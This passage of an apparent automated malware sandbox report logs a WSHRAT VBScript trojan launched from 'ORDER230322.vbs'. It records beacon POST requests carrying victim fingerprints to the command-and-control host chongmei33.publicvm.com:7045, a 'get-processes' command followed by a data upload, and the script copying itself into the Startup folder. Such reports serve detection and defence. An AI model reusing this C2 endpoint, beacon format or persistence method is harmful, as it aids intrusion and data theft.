                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.349701103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:10.473997116 CET105OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      30192.168.2.349728103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:47.984992981 CET142OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      31192.168.2.349729103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:53.627793074 CET143OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      32192.168.2.349730103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:41:00.836848974 CET144OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      33192.168.2.349731103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:41:06.386063099 CET144OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      34192.168.2.349732103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:41:12.041835070 CET145OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Mar 22, 2023 11:41:12.574285984 CET146OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.349702103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:16.269118071 CET106OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.349703103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:21.870237112 CET107OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Mar 22, 2023 11:38:22.107378006 CET107INHTTP/1.1 200 OK
                      Content-Length: 13
                      Connection: close
                      Data Raw: 67 65 74 2d 70 72 6f 63 65 73 73 65 73
                      Data Ascii: get-processes


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.349704103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:22.632777929 CET108OUTPOST /is-processes HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 4374
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7192.168.2.349705103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:31.858319998 CET123OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.349706103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:37.956187010 CET124OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      9192.168.2.349707103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:44.353442907 CET124OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:11:37:07
                      Start date:22/03/2023
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs"
                      Imagebase:0x7ff601d70000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:10
                      Start time:11:37:28
                      Start date:22/03/2023
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase:0x7ff601d70000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:11
                      Start time:11:37:41
                      Start date:22/03/2023
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase:0x7ff601d70000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:12
                      Start time:11:37:51
                      Start date:22/03/2023
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase:0x7ff651c80000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:13
                      Start time:11:38:00
                      Start date:22/03/2023
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs"
                      Imagebase:0x7ff601d70000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:14
                      Start time:11:38:16
                      Start date:22/03/2023
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase:0x7ff601d70000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      No disassembly